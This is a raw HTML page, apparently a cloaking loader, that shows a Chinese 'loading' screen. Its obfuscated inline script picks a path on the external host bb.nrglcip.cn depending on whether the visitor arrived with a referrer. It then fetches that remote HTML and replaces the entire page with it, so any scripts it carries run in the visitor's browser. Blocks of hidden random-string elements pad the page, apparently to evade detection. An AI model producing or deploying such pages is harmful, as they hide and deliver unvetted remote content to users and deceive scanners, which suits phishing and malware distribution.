<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .NUMZJBYjDV3 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .NUMZJBYjDV3 .AoYlJq {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .NUMZJBYjDV3 .content {
            line-height: 50px;
            text-align: center
        }

        .NUMZJBYjDV3 .img {
            width: 100%
        }

        .NUMZJBYjDV3 .P5wxiCv10b {
            text-align: center
        }

        .NUMZJBYjDV3 .P5wxiCv10b span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .NUMZJBYjDV3 .P5wxiCv10b span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .NUMZJBYjDV3 .P5wxiCv10b span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .NUMZJBYjDV3 .P5wxiCv10b span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .NUMZJBYjDV3 .P5wxiCv10b span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .NUMZJBYjDV3 .P5wxiCv10b span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .NUMZJBYjDV3 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function mjmXT4WekBTG(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var gr2zuL = mjmXT4WekBTG('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ gr2zuL +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ gr2zuL +".html?a=share";
		}
		
        CX2M7SyLA=url+"#"+new Date().getTime();
        CX2M7SyLA && function() {
            $.get(CX2M7SyLA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>WcFL6VTkkY1VGlEafuDAs39egj240yIXfPZ8sgedFpvWZYoKCWMV886zACr5RsQXzj2XGLIRo5QGxOv6p5xJjtKI0dNf6</div>
<li style='display:none' >VQnNm5rItWJH08PgFWQE2uR8TMBCLJjqI4Fmepx0RsoD2tnDw1WaJ</li>
<a  href='#' style='display:none'>WZqdhATRzm0f9XJrnzM2L2xZo5tJJcdYZ9mNxxAbOBsRPg2Zl0vFrp2wyAPqWvvCvPB</a>
<p  style='display:none'>XmHj4pzviTPHvpfZX7veOMTg</p>
<div style='display:none'>WcFL6VTkkY1VGlEafuDAs39egj240yIXfPZ8sgedFpvWZYoKCWMV886zACr5RsQXzj2XGLIRo5QGxOv6p5xJjtKI0dNf6</div>
<p  style='display:none'>XmHj4pzviTPHvpfZX7veOMTg</p>
<b style='display:none' >ONASIZnqngushzlP8hDZgAAJyHKsCFFCArThWj</b>
<li style='display:none' >VQnNm5rItWJH08PgFWQE2uR8TMBCLJjqI4Fmepx0RsoD2tnDw1WaJ</li><div class="NUMZJBYjDV3">
    <div class="AoYlJq">
        <div class="P5wxiCv10b">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<h1 style='display:none' >dmTnnM6wqyKhICLyJ0u2HCpzVxyWGRBPKina4lUj6eeSuZFYmODMk7x</h1>
<a  href='#' style='display:none'>rR4mjvTr69tFXXsm01</a>
<img  src='' style='display:none'>
<li style='display:none' >rGYBCc2hCS7gfjVDGgAqpDnKsUAjdRb6sj3q0jCoOSSMgI8Zkna4zS4Tma</li>
<p  style='display:none'>lEd0kFdSqqJwiCPR2S4D77eVQL0gwNuQVT4b95j1XJcW</p>
<div style='display:none'>bizfhZH33bMcO789FX8u2R</div>
<h1 style='display:none' >dmTnnM6wqyKhICLyJ0u2HCpzVxyWGRBPKina4lUj6eeSuZFYmODMk7x</h1></body>
</html>